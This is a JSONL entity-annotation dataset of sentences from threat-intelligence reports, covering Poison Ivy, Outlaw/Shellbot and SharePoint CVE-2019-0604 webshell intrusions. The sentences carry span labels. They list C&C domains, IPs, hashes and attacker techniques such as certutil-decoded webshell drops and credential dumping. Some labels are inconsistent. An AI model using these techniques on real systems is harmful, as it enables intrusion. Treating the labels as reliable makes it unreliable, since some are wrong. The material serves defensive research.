{"text": "This application is freely available from poisonivy-rat.com .", "spans": [{"start": 42, "end": 59, "label": "Indicator"}]}
{"text": "It comes fully loaded with a number of plug-ins to give an attacker complete control of the compromised computer .", "spans": []}
{"text": "The method of delivery has changed over time as the attackers have changed targets .", "spans": []}
{"text": "Older attacks involved a self-extracting archive with a suggestive name , for example : \u201c Human right report of north Africa under the war . scr \u201d .", "spans": []}
{"text": "The most recent attacks focusing on the chemical industry are using password-protected 7zip files which , when extracted , contain a self-extracting executable .", "spans": [{"start": 87, "end": 91, "label": "System"}]}
{"text": "The password to extract the 7zip file is included in the email .", "spans": [{"start": 28, "end": 32, "label": "System"}, {"start": 57, "end": 62, "label": "System"}]}
{"text": "This extra stage is used to prevent automated systems from extracting the self-extracting archive .", "spans": []}
{"text": "Some example file names using this technique include : AntiVirus_update_package.7z , acquisition.7z , offer.7z , update_flashplayer10ax.7z .", "spans": [{"start": 55, "end": 82, "label": "Indicator"}, {"start": 85, "end": 99, "label": "Indicator"}, {"start": 102, "end": 110, "label": "Indicator"}, {"start": 113, "end": 138, "label": "Indicator"}]}
{"text": "When the self-extracting archive file is executed , it will drop two files .", "spans": []}
{"text": "Examples of file names that are used include : %Temp%\\happiness.txt , %Temp%\\xxxx.exe .", "spans": [{"start": 47, "end": 67, "label": "Indicator"}, {"start": 70, "end": 85, "label": "Indicator"}]}
{"text": "The executable file , xxxx.exe in this case , is then executed .", "spans": [{"start": 22, "end": 30, "label": "Indicator"}]}
{"text": "The second file , happiness.txt , contains custom code in binary format that is encrypted and used by xxxx.exe .", "spans": [{"start": 18, "end": 31, "label": "Indicator"}, {"start": 102, "end": 110, "label": "Indicator"}]}
{"text": "The xxxx.exe file copies happiness.txt to C:\\PROGRAM FILES\\common files\\ODBC\\ODUBC.DLL and to C:\\WINDOWS\\system32\\jql.sys .", "spans": [{"start": 4, "end": 12, "label": "Indicator"}, {"start": 25, "end": 38, "label": "Indicator"}, {"start": 42, "end": 86, "label": "Indicator"}, {"start": 94, "end": 121, "label": "Indicator"}]}
{"text": "It then loads the contents of the encrypted file and injects it into the explorer.exe and iexplore.exe processes .", "spans": [{"start": 73, "end": 85, "label": "Indicator"}, {"start": 90, "end": 102, "label": "Indicator"}]}
{"text": "The injected code copies xxxx.exe to %System%\\winsys.exe and connects to the Command and Control ( C&C ) server on TCP port 80 .", "spans": [{"start": 25, "end": 33, "label": "Indicator"}, {"start": 37, "end": 56, "label": "Indicator"}, {"start": 77, "end": 96, "label": "System"}, {"start": 99, "end": 102, "label": "System"}, {"start": 115, "end": 118, "label": "Indicator"}]}
{"text": "The communication with the server is a handshake using an encryption algorithm ( Camellia ) .", "spans": []}
{"text": "Once the Trojan establishes the server \u2019s authenticity , it expects a variable-size block of binary code that is read from the server straight into the virtual space for iexplore.exe and then executed .", "spans": [{"start": 9, "end": 15, "label": "Malware"}, {"start": 170, "end": 182, "label": "Indicator"}]}
{"text": "When executed , the Poison Ivy threat , or Backdoor.Odivy , connects to a command and control ( C&C ) server over TCP port 80 .", "spans": [{"start": 20, "end": 30, "label": "Malware"}, {"start": 43, "end": 57, "label": "Indicator"}, {"start": 74, "end": 93, "label": "System"}, {"start": 96, "end": 99, "label": "System"}, {"start": 114, "end": 117, "label": "Indicator"}]}
{"text": "A number of different C&C domains and IP addresses were identified .", "spans": [{"start": 22, "end": 25, "label": "System"}]}
{"text": "The majority of samples connect to a domain ; however one subset of samples connected directly to the IP address 204.74.215.58 , which belonged to the Chinese QQ user mentioned previously and was also associated with antivirus-groups.com . .", "spans": [{"start": 113, "end": 126, "label": "Indicator"}, {"start": 159, "end": 161, "label": "System"}, {"start": 217, "end": 237, "label": "Indicator"}]}
{"text": "org : 173.252.207.71 , 173.252.205.36 , 173.252.205.37 , 173.252.205.64 . antivirus-groups.com : 74.82.166.205 , 204.74.215.58 . domain.rm6.org : 216.131.95.22 , 222.255.28.27 . anti-virus.sytes.net : 173.252.205.36 , 173.252.205.37 , 173.252.205.64 .", "spans": [{"start": 0, "end": 3, "label": "Indicator"}, {"start": 6, "end": 20, "label": "Indicator"}, {"start": 23, "end": 37, "label": "Indicator"}, {"start": 40, "end": 54, "label": "Indicator"}, {"start": 57, "end": 71, "label": "Indicator"}, {"start": 74, "end": 94, "label": "Indicator"}, {"start": 97, "end": 110, "label": "Indicator"}, {"start": 113, "end": 126, "label": "Indicator"}, {"start": 129, "end": 143, "label": "Indicator"}, {"start": 146, "end": 159, "label": "Indicator"}, {"start": 162, "end": 175, "label": "Indicator"}, {"start": 178, "end": 198, "label": "Indicator"}, {"start": 201, "end": 215, "label": "Indicator"}, {"start": 218, "end": 232, "label": "Indicator"}, {"start": 235, "end": 249, "label": "Indicator"}]}
{"text": "Several other hacker groups have also begun targeting some of the same chemical companies in this time period .", "spans": []}
{"text": "Attackers are sending malicious PDF and DOC files , which use exploits to drop variants of Backdoor.Sogu .", "spans": [{"start": 32, "end": 35, "label": "System"}, {"start": 40, "end": 43, "label": "System"}, {"start": 91, "end": 104, "label": "Indicator"}]}
{"text": "This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users .", "spans": []}
{"text": "Determining if the two groups are related is difficult , but any relationship appears unlikely .", "spans": []}
{"text": "The attackers described in this document use a very basic delivery platform ; compressed self-extracting archives sometimes sent to a large number of recipients .", "spans": []}
{"text": "The Sogu gang , in contrast , use PDF and DOC files in very tailored , targeted emails .", "spans": [{"start": 4, "end": 8, "label": "Organization"}, {"start": 34, "end": 37, "label": "System"}, {"start": 42, "end": 45, "label": "System"}, {"start": 80, "end": 86, "label": "System"}]}
{"text": "The Sogu gang use a custom developed threat \u2013 Backdoor.Sogu , whereas the group described in this document use an off the shelf threat \u2013 Poison Ivy .", "spans": [{"start": 4, "end": 8, "label": "Organization"}, {"start": 46, "end": 59, "label": "Indicator"}, {"start": 137, "end": 147, "label": "Malware"}]}
{"text": "While the number of Sogu targets is currently small relative to the Poison Ivy attacks , we continue to monitor their activities .", "spans": [{"start": 20, "end": 24, "label": "Organization"}, {"start": 68, "end": 78, "label": "Malware"}]}
{"text": "Numerous targeted attack campaigns are occurring every week .", "spans": []}
{"text": "However , relative to the total number of attacks , few are fully disclosed .", "spans": []}
{"text": "These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations .", "spans": []}
{"text": "This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes .", "spans": []}
{"text": "Outlaw Updates Kit to Kill Older Miner Versions , Targets More Systems .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]}
{"text": "As we \u2019ve observed with cybercriminal groups that aim to maximize profits for every campaign , silence doesn\u2019t necessarily mean inactivity .", "spans": []}
{"text": "It appears hacking group Outlaw , which has been silent for the past few months , was simply developing their toolkit for illicit income sources .", "spans": [{"start": 25, "end": 31, "label": "Organization"}]}
{"text": "While they have been quiet since our June analysis , we observed an increase in the group \u2019s activities in December , with updates on the kits \u2019 capabilities reminiscent of their previous attacks .", "spans": []}
{"text": "The updates expanded scanner parameters and targets , looped execution of files via error messages , improved evasion techniques for scanning activities , and improved mining profits by killing off both the competition and their own previous miners .", "spans": []}
{"text": "We analyzed the kits , which were designed to steal information from the automotive and finance industries , launch subsequent attacks on already compromised systems , and ( possibly ) sell stolen information .", "spans": []}
{"text": "Comparing this development to their previous attacks , we think Outlaw may be aiming to go after enterprises that have yet to update their systems , assessing security and changes with their previously infected hosts , finding new and old targets , and possibly testing their updates in the wild .", "spans": [{"start": 64, "end": 70, "label": "Organization"}]}
{"text": "We will continue to observe the group \u2019s activities as they target industries from the United States and Europe .", "spans": []}
{"text": "Based on the samples we collected and traced to 456 distinct IPs , we expect the group to be more active in the coming months as we observed changes on the versions we acquired .", "spans": []}
{"text": "These new samples targeted Linux- and Unix-based operating systems , vulnerable servers , and internet of things ( IoT ) devices by exploiting known vulnerabilities with available exploits .", "spans": [{"start": 27, "end": 33, "label": "System"}, {"start": 38, "end": 48, "label": "System"}]}
{"text": "This time , the group explored unpatched systems vulnerable to CVE-2016-8655 and Dirty COW exploit ( CVE-2016-5195 ) as attack vectors .", "spans": [{"start": 63, "end": 76, "label": "Vulnerability"}, {"start": 81, "end": 90, "label": "Vulnerability"}, {"start": 101, "end": 114, "label": "Vulnerability"}]}
{"text": "Files using simple PHP-based web shells were also used to attack systems with weak SSH and Telnet credentials .", "spans": [{"start": 19, "end": 28, "label": "System"}, {"start": 83, "end": 86, "label": "Indicator"}, {"start": 91, "end": 97, "label": "Indicator"}]}
{"text": "While no phishing- or social engineering-initiated routines were observed in this campaign , we found multiple attacks over the network that are considered \u201c loud. \u201d These involved large-scale scanning operations of IP ranges intentionally launched from the command and control ( C&C ) server .", "spans": [{"start": 258, "end": 277, "label": "System"}, {"start": 280, "end": 283, "label": "System"}]}
{"text": "The honeynet graphs , which show activity peaks associated with specific actions , also suggest that the scans were timed .", "spans": []}
{"text": "From the sample we analyzed , attacks started from one virtual private server ( VPS ) that searches for a vulnerable machine to compromise ( previous techniques used malicious URLs or infecting legitimate websites for bot propagation ) .", "spans": [{"start": 55, "end": 77, "label": "System"}, {"start": 80, "end": 83, "label": "System"}]}
{"text": "Once infected , the C&C commands for the infected system launches a loud scanning activity and spreads the botnet by sending a \u201c whole kit \u201d of binary files at once with naming conventions same as the ones already in the targeted host , likely banking on breaking through via \u201c security through obscurity. \u201d They attempted to evade traffic inspection by encoding the code for the scanner with base-64 .", "spans": [{"start": 20, "end": 23, "label": "System"}]}
{"text": "The zombie host initiates the scan \u2014 another routine from previous campaigns \u2014 but updated with a larger set of parameters and programmed to run in the background .", "spans": []}
{"text": "The kit we found is in tgz format , though we have observed some samples disguised as png or jpg .", "spans": [{"start": 23, "end": 26, "label": "System"}, {"start": 86, "end": 89, "label": "System"}, {"start": 93, "end": 96, "label": "System"}]}
{"text": "While previous routines took advantage of competing miners \u2019 activities and unrelated components to hijack the profit , the latest version of the code attempts to remove all related files and codes from previous infections ( including their own to make sure the running components are updated , as well as those from other cybercriminals to maximize the resources of the zombie host ) and creates a new working directory /tmp/.X19-unix to move the kit and extract the files .", "spans": []}
{"text": "The tsm binary then runs in the background , forwarding a series of error messages to /dev/null to keep the code running , ensuring the continuous execution of the code referenced with a set of parameters /tmp/up.txt .", "spans": [{"start": 205, "end": 216, "label": "Indicator"}]}
{"text": "The script then waits 20 minutes before it runs the wrapper script initall :", "spans": []}
{"text": "2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]}
{"text": "initall .", "spans": []}
{"text": "Another variant executes a set of commands once a system is successfully compromised .", "spans": []}
{"text": "Most of these commands are related to gathering information from the infected machine ( number of CPU cores , users , scheduled tasks , running processes , OS installed , and CPU and memory information ) via the dota3 payload , as well as changing the password to a random string also stored in /tmp/up.txt .", "spans": [{"start": 98, "end": 101, "label": "System"}, {"start": 175, "end": 178, "label": "System"}, {"start": 212, "end": 217, "label": "System"}, {"start": 295, "end": 306, "label": "Indicator"}]}
{"text": "In a previous execution ( published in June 2019 ) , we observed that dota2 had its own folder but it was hardly executed .", "spans": [{"start": 70, "end": 75, "label": "System"}]}
{"text": "Running the script removes the remaining files and scripts from previous attacks , keeping a low profile to evade detection .", "spans": []}
{"text": "If the system has been previously infected with a cryptominer , it also attempts to kill the running miner and all its related activities .", "spans": []}
{"text": "Based on a bashtemp directory of the latest sample we found , there are other compiled ELF scripts , named init and init2 , that loops the kit to keep running :", "spans": [{"start": 87, "end": 90, "label": "System"}]}
{"text": "0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6", "spans": [{"start": 0, "end": 64, "label": "Indicator"}]}
{"text": "init . 93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494", "spans": [{"start": 7, "end": 71, "label": "Indicator"}]}
{"text": "init2 .", "spans": []}
{"text": "Both init and init2 scripts make sure all other running mining services are killed , and that all the files in the working directory are executed by giving 777 permissions .", "spans": []}
{"text": "We also found the init0 script running ; the script cleans out all miners regardless of its origin .", "spans": []}
{"text": "It then resets cron and removes possible cache files from other programs , starts scripts and binaries a , init0 , and start , and sets the persistence by modifying the crontab .", "spans": []}
{"text": "The a binary is a script wrapper to start run , a Perl-obfuscated script for installation of a Shellbot to gain control of the infected system .", "spans": [{"start": 50, "end": 65, "label": "System"}, {"start": 95, "end": 103, "label": "Malware"}]}
{"text": "The Shellbot disguises itself as a process named rsync , commonly the binary seen on many Unix- and Linux-based systems to automatically run for backup and synchronization .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 90, "end": 95, "label": "System"}, {"start": 100, "end": 111, "label": "System"}]}
{"text": "This allows the malicious activity to evade detection .", "spans": []}
{"text": "The Shellbot script is added to run after the victim \u2019s system reboots , and scripts /a/upd , /b/sync/ , and /c/aptitude/ are added to the crontab .", "spans": [{"start": 4, "end": 12, "label": "Malware"}]}
{"text": "However , while we observed the presence of the codes , the functions of upd , sync and aptitude were disabled in the kits \u2019 latest version .", "spans": []}
{"text": "It remains unclear whether these are leftover code from the previous versions or their particular purposes were served .", "spans": []}
{"text": "Shellbot is also used to control the botnet , with a command that is sent and run from the C&C to determine if there is a code execution in the shell , the hostname , and its architecture .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 91, "end": 94, "label": "System"}]}
{"text": "All results and system information collected from the infected system are stored locally in the device for a period before Outlaw retrieves them via the C&C .", "spans": [{"start": 123, "end": 129, "label": "Organization"}, {"start": 153, "end": 156, "label": "System"}]}
{"text": "Since discovering the operations of this group in 2018 , Outlaw continues to use scripts , codes , and commands that have been previously used and deployed .", "spans": [{"start": 57, "end": 63, "label": "Organization"}]}
{"text": "These routines are indicative of the group \u2019s aim to get quantitative returns through varied cybercriminal profit streams .", "spans": []}
{"text": "This was also reinforced by their naming conventions , wherein different versions are simply named after the code iterations , following a specific format regardless of the actual function of the code .", "spans": []}
{"text": "Trojan.SH.MALXMR.UWEJP : 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa .", "spans": [{"start": 0, "end": 22, "label": "Malware"}, {"start": 25, "end": 89, "label": "Indicator"}]}
{"text": "Backdoor.SH.SHELLBOT.AA : b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d .", "spans": [{"start": 0, "end": 23, "label": "Malware"}, {"start": 26, "end": 90, "label": "Indicator"}]}
{"text": "Trojan.Linux.SSHBRUTE.B : 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976 .", "spans": [{"start": 0, "end": 23, "label": "Malware"}, {"start": 26, "end": 90, "label": "Indicator"}]}
{"text": "Coinminer.Linux.MALXMR.SMDSL32 : fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a .", "spans": [{"start": 0, "end": 30, "label": "Malware"}, {"start": 33, "end": 97, "label": "Indicator"}]}
{"text": "Coinminer.Linux.MALXMR.SMDSL64 : 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 .", "spans": [{"start": 0, "end": 30, "label": "Malware"}, {"start": 33, "end": 97, "label": "Indicator"}]}
{"text": "Actors Still Exploiting SharePoint Vulnerability to Attack Middle East Government Organizations .", "spans": [{"start": 24, "end": 34, "label": "System"}]}
{"text": "On September 10 , 2019 , we observed unknown threat actors exploiting a vulnerability in SharePoint described in CVE-2019-0604 to install several webshells on the website of a Middle East government organization .", "spans": [{"start": 37, "end": 44, "label": "Organization"}, {"start": 89, "end": 99, "label": "System"}, {"start": 113, "end": 126, "label": "Vulnerability"}]}
{"text": "One of these webshells is the open source AntSword webshell freely available on Github , which is remarkably similar to the infamous China Chopper webshell .", "spans": [{"start": 42, "end": 50, "label": "System"}, {"start": 80, "end": 86, "label": "System"}, {"start": 139, "end": 146, "label": "System"}]}
{"text": "On January 10 , 2020 , we used Shodan to search for Internet accessible servers running versions of SharePoint vulnerable to CVE-2019-0604 .", "spans": [{"start": 31, "end": 37, "label": "System"}, {"start": 100, "end": 110, "label": "System"}, {"start": 125, "end": 138, "label": "Vulnerability"}]}
{"text": "While admittedly the version numbers provided by SharePoint within HTTP responses do not always provide the precise SharePoint version number , we decided to use it to check if it was less than the version numbers of the patched SharePoint versions from the Microsoft advisory .", "spans": [{"start": 49, "end": 59, "label": "System"}, {"start": 67, "end": 71, "label": "Indicator"}, {"start": 116, "end": 126, "label": "System"}, {"start": 229, "end": 239, "label": "System"}, {"start": 258, "end": 267, "label": "Organization"}]}
{"text": "We performed this comparison and found 28,881 servers that advertised a vulnerable version of SharePoint .", "spans": [{"start": 94, "end": 104, "label": "System"}]}
{"text": "We did not actively check each server to verify if they were indeed vulnerable , so it is possible that many of these public-facing SharePoint servers were not vulnerable or since patched .", "spans": [{"start": 132, "end": 142, "label": "System"}]}
{"text": "Regardless , the sheer number of servers and publicly available exploit code suggests that CVE-2019-0604 is still a major attack vector .", "spans": [{"start": 91, "end": 104, "label": "Vulnerability"}]}
{"text": "Using this collection of webshells , the actors moved laterally to other systems on the network by dumping credentials with a variant of the notorious Mimikatz tool and using Impacket \u2019s atexec tool to use dumped credentials to run commands on other systems .", "spans": [{"start": 151, "end": 159, "label": "System"}, {"start": 175, "end": 183, "label": "System"}]}
{"text": "On September 19 , 2019 , we observed the same exact Mimikatz variant uploaded to a webshell hosted at another government organization in a second country in the Middle East .", "spans": [{"start": 52, "end": 60, "label": "System"}]}
{"text": "The Mimikatz variant uploaded to these two organizations is unique , as it involves a seemingly custom loader application written in .NET .", "spans": [{"start": 4, "end": 12, "label": "System"}, {"start": 133, "end": 137, "label": "System"}]}
{"text": "Therefore , we believe that the same threat group is behind both intrusions .", "spans": []}
{"text": "Back in April 2019 , we first observed the Emissary Panda threat group exploiting CVE-2019-0604 to install webshells on SharePoint servers at government organizations in two Middle Eastern countries .", "spans": [{"start": 43, "end": 57, "label": "Organization"}, {"start": 82, "end": 95, "label": "Vulnerability"}, {"start": 120, "end": 130, "label": "System"}]}
{"text": "Fast forward five months to the current attacks and we see exploitation of the same vulnerability at government organizations in two different countries compared to the April attacks .", "spans": []}
{"text": "We do not have any strong ties to connect the current attacks exploiting this vulnerability in SharePoint with the Emissary Panda attacks carried out in April .", "spans": [{"start": 95, "end": 105, "label": "System"}, {"start": 115, "end": 129, "label": "Organization"}]}
{"text": "The overlaps between these two sets of attacks include exploitation of a common vulnerability , similar toolset and a shared government victimology , but no strong pivot points to connect these attack campaigns together .", "spans": []}
{"text": "The exploitation of this vulnerability is not unique to Emissary Panda , as multiple threat groups are using this vulnerability to exploit SharePoint servers to gain initial access to targeted networks .", "spans": [{"start": 56, "end": 70, "label": "Organization"}, {"start": 139, "end": 149, "label": "System"}]}
{"text": "We would like to acknowledge the possibility of an overlap in the AntSword webshell , as we stated that Emissary Panda used China Chopper in the April attacks and AntSword and China Chopper webshells are incredibly similar .", "spans": [{"start": 66, "end": 74, "label": "System"}, {"start": 104, "end": 118, "label": "Organization"}, {"start": 130, "end": 137, "label": "System"}, {"start": 163, "end": 171, "label": "System"}, {"start": 182, "end": 189, "label": "System"}]}
{"text": "However , at this time we do not believe the April attacks used AntSword based on artifacts analyzed on the SharePoint server , specifically none of the IIS logs in the April attacks used the AntSword User-Agent in requests to the webshell that were observed in the current attacks .", "spans": [{"start": 108, "end": 118, "label": "System"}, {"start": 153, "end": 156, "label": "System"}, {"start": 192, "end": 200, "label": "System"}, {"start": 201, "end": 211, "label": "System"}]}
{"text": "Palo Alto Networks customers are protected from the threat described in this blog through Threat Prevention signatures for the exploits and C2 traffic as well as through WildFire .", "spans": [{"start": 0, "end": 18, "label": "System"}, {"start": 140, "end": 142, "label": "System"}, {"start": 170, "end": 178, "label": "System"}]}
{"text": "More details on this protection is available in the conclusion of the report .", "spans": []}
{"text": "On September 10 , 2019 , we observed an HTTP POST request to the following URL that we believe was the exploitation of CVE-2019-0604 in a publicly facing SharePoint server ( T1190 ) : /_layouts/15/picker.aspx .", "spans": [{"start": 40, "end": 44, "label": "Indicator"}, {"start": 119, "end": 132, "label": "Vulnerability"}, {"start": 154, "end": 164, "label": "System"}, {"start": 184, "end": 208, "label": "Indicator"}]}
{"text": "The command uses the echo command to write a large chunk of base64 encoded data to a text file named cmd.txt .", "spans": [{"start": 101, "end": 108, "label": "Indicator"}]}
{"text": "The command then uses the certutil application to convert the base64 encoded data ( T1132 ) in the cmd.txt file to c.aspx in three different SharePoint related folders .", "spans": [{"start": 99, "end": 106, "label": "Indicator"}, {"start": 115, "end": 121, "label": "Indicator"}, {"start": 141, "end": 151, "label": "System"}]}
{"text": "The result of this entire command saves a variant of the Awen asp.net webshell ( T1100 ) to the SharePoint server to further interact with the compromise server .", "spans": [{"start": 57, "end": 61, "label": "System"}, {"start": 62, "end": 69, "label": "Indicator"}, {"start": 96, "end": 106, "label": "System"}]}
{"text": "The Awen webshell deployed in the exploitation of this SharePoint vulnerability had a SHA256 hash of 5d4628d4dd89f31236f8c56686925cbb1a9b4832f81c95a4300e64948afede21 .", "spans": [{"start": 4, "end": 8, "label": "System"}, {"start": 55, "end": 65, "label": "System"}, {"start": 101, "end": 165, "label": "Indicator"}]}
{"text": "Just 40 seconds after the suspected exploitation of CVE-2019-0604 , we observed the first HTTP GET request to a webshell at c.aspx , which is a modified version of the freely available awen asp.net webshell .", "spans": [{"start": 52, "end": 65, "label": "Vulnerability"}, {"start": 90, "end": 94, "label": "Indicator"}, {"start": 124, "end": 130, "label": "Indicator"}, {"start": 185, "end": 189, "label": "System"}, {"start": 190, "end": 197, "label": "Indicator"}]}
{"text": "We believe this HTTP GET request was the actor visiting the webshell after exploitation and prior to executing commands .", "spans": [{"start": 16, "end": 20, "label": "Indicator"}]}
{"text": "The actor uses the Awen webshell to run various commands to do an initial discovery on the system and network , including user accounts ( T1033 and T1087 ) , files and folders ( T1083 ) , privileged groups ( T1069 ) , remote systems ( T1018 ) and network configuration ( T1016 ) .", "spans": [{"start": 19, "end": 23, "label": "System"}]}
{"text": "Table 1 not only shows the commands used for discovery , but also the commands used to deploy another webshell to the server using the echo command to write base64 encoded data to a.txt and using the certutil application to decode and save to bitreeview.aspx .", "spans": [{"start": 180, "end": 185, "label": "Indicator"}, {"start": 243, "end": 258, "label": "Indicator"}]}
{"text": "The webshell named bitreeview.aspx was saved to a folder within the SharePoint server \u2019s install path .", "spans": [{"start": 19, "end": 34, "label": "Indicator"}, {"start": 68, "end": 78, "label": "System"}]}
{"text": "The bitreeview.aspx file is a variant of the AntSword webshell that has undeniably similar traits as the infamous China Chopper webshell .", "spans": [{"start": 4, "end": 19, "label": "Indicator"}, {"start": 45, "end": 53, "label": "System"}, {"start": 120, "end": 127, "label": "System"}]}
{"text": "After installing this AntSword webshell , the actor no longer uses the Awen webshell and issues the first command to AntSword 35 seconds after the last command issued to the Awen webshell .", "spans": [{"start": 22, "end": 30, "label": "System"}, {"start": 71, "end": 75, "label": "System"}, {"start": 117, "end": 125, "label": "System"}, {"start": 174, "end": 178, "label": "System"}]}
{"text": "AntSword is a modular webshell that involves a very simple webshell that the actor would deploy to the compromised server and a client application referred to as the AntSword Shell Manager .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 166, "end": 174, "label": "System"}, {"start": 175, "end": 188, "label": "System"}]}
{"text": "The use of the client application differs from many other webshells that the actor would interact with in a browser window .", "spans": []}
{"text": "The actor would use the AntSword Shell Manager to interact with the AntSword webshell on the compromised server , as the Shell Manager sends the appropriate script to the webshell that will execute to carry out the desired action .", "spans": [{"start": 24, "end": 32, "label": "System"}, {"start": 33, "end": 46, "label": "System"}, {"start": 68, "end": 76, "label": "System"}, {"start": 121, "end": 134, "label": "System"}]}
{"text": "To provide a sense of the limited functionality within the webshell itself , the bitreeview.aspx AntSword webshell deployed in this attack ( SHA256: 15ecb6ac6c637b58b2114e6b21b5b18b0c9f5341ee74b428b70e17e64b7da55e ) was only 162 bytes .", "spans": [{"start": 81, "end": 96, "label": "Indicator"}, {"start": 97, "end": 105, "label": "System"}, {"start": 149, "end": 213, "label": "Indicator"}]}
{"text": "AntSword webshell has no functionality other than running a script provided by the AntSword Shell Manager , specifically within a field named Darr1R1ng of an HTTP POST request .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 83, "end": 91, "label": "System"}, {"start": 92, "end": 105, "label": "System"}, {"start": 158, "end": 162, "label": "Indicator"}]}
{"text": "The code above also tells us the actors had created their own custom \u201c encoder \u201d within the AntSword Shell Manager to be able to interact with the code above , which we will discuss in detail in the next section .", "spans": [{"start": 92, "end": 100, "label": "System"}, {"start": 101, "end": 114, "label": "System"}]}
{"text": "In addition to the Mimikatz tool , the actor uploaded other tools to the webshell hosted at this second organization . es.exe : Mimikatz with custom loader , da53dcaeede03413ba02802c4be10883c4c28d3d28dee11734f048b90eb3d304 .", "spans": [{"start": 19, "end": 27, "label": "System"}, {"start": 119, "end": 125, "label": "Indicator"}, {"start": 128, "end": 136, "label": "System"}, {"start": 158, "end": 222, "label": "Indicator"}]}
{"text": "Rar.exe : Legitimate WinRAR , 26d9212ec8dbca45383eb95ec53c05357851bd7529fa0761d649f62e90c4e9fd . atec.exe : Compiled Impacket atexec tool , a4aca75bcc8f18b8a2316fd67a7e545c59b871d32de0b325f56d22584038fa10 . dmp.exe : Dumpert tool , e4e05c9a216c2f2b3925293503b5d5a892c33db2f6ea58753f032b80608c3f2e .", "spans": [{"start": 0, "end": 7, "label": "Indicator"}, {"start": 21, "end": 27, "label": "System"}, {"start": 30, "end": 94, "label": "Indicator"}, {"start": 97, "end": 105, "label": "Indicator"}, {"start": 117, "end": 125, "label": "System"}, {"start": 140, "end": 204, "label": "Indicator"}, {"start": 207, "end": 214, "label": "Indicator"}, {"start": 217, "end": 224, "label": "System"}, {"start": 232, "end": 296, "label": "Indicator"}]}
{"text": "One of the tools seen above that caught our interest was the Dumpert tool , which is freely available on Outflanknl \u2019s GitHub repository .", "spans": [{"start": 61, "end": 68, "label": "System"}, {"start": 105, "end": 115, "label": "System"}, {"start": 119, "end": 125, "label": "System"}]}
{"text": "The author of Dumpert describes the tool as an LSASS dumping tool that uses direct system calls and API unhooking to evade antivirus and EDR solutions .", "spans": [{"start": 14, "end": 21, "label": "System"}, {"start": 47, "end": 52, "label": "System"}, {"start": 137, "end": 140, "label": "System"}]}
{"text": "Dumpert is a relatively new tool with its initial commit to GitHub occurring on June 17 , 2019 .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 60, "end": 66, "label": "System"}]}
{"text": "While the Dumpert tool is meant to help red teams emulate an adversary , we had not seen this tool used by threat actors until it was uploaded to this related webshell on September 23 , 2019 .", "spans": [{"start": 10, "end": 17, "label": "System"}]}
{"text": "Threat actors continue to exploit the CVE-2019-0604 vulnerability to compromise SharePoint servers , which is a vulnerability that Microsoft released a patch for in March 2019 .", "spans": [{"start": 38, "end": 51, "label": "Vulnerability"}, {"start": 80, "end": 90, "label": "System"}, {"start": 131, "end": 140, "label": "Organization"}]}
{"text": "We observed actors installing webshells to the SharePoint server that they use to run commands and upload additional tools to in order to dump credentials and move laterally to other systems on the network .", "spans": [{"start": 47, "end": 57, "label": "System"}]}
{"text": "We were also able to find a related webshell based on the threat group \u2019s tool reuse , specifically a custom Mimikatz sample .", "spans": [{"start": 109, "end": 117, "label": "System"}]}
{"text": "Thanks to this tool reuse , we found the threat group uploading a credential dumping tool called Dumpert that we had not seen used in prior incidents involving the exploitation of CVE-2019-0604 .", "spans": [{"start": 97, "end": 104, "label": "System"}, {"start": 180, "end": 193, "label": "Vulnerability"}]}
{"text": "Digital Attack on German Parliament: Investigative Report on the Hack of the Left Party Infrastructure in Bundestag .", "spans": [{"start": 106, "end": 115, "label": "Organization"}]}
{"text": "Two suspicious artifacts have been retrieved from two separate servers within the Die Linke infrastructure .", "spans": []}
{"text": "One is an open source utility used to remotely issue commands on a Windows host from a Linux host .", "spans": [{"start": 67, "end": 74, "label": "System"}, {"start": 87, "end": 92, "label": "System"}]}
{"text": "The other is a custom utility which , despite its large size , has limited functionality and acts as a tunnel , possibly used by the attackers to maintain persistence within the compromised network .", "spans": []}
{"text": "Attributes of one of the artifacts and intelligence gathered on the infrastructure operated by the attackers suggest that the attack was perpetrated by a state-sponsored group known as Sofacy ( or APT28 ) .", "spans": [{"start": 185, "end": 191, "label": "Organization"}, {"start": 197, "end": 202, "label": "Organization"}]}
{"text": "Previous work published by security vendor FireEye in October 2014 suggests the group might be of Russian origin .", "spans": [{"start": 43, "end": 50, "label": "Organization"}]}
{"text": "The first artifact \u2013 identified across this report as Artifact #1 \u2013 has the following attributes :", "spans": []}
{"text": "Name winexesvc.exe Size 23552 MD5 77e7fb6b56c3ece4ef4e93b6dc608be0 SHA1 f46f84e53263a33e266aae520cb2c1bd0a73354e SHA256 5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d .", "spans": [{"start": 5, "end": 18, "label": "Indicator"}, {"start": 34, "end": 66, "label": "Indicator"}, {"start": 72, "end": 112, "label": "Indicator"}, {"start": 120, "end": 184, "label": "Indicator"}]}
{"text": "The second artifact \u2013 identified across this report as Artifact #2 \u2013 -has the following attributes :", "spans": []}
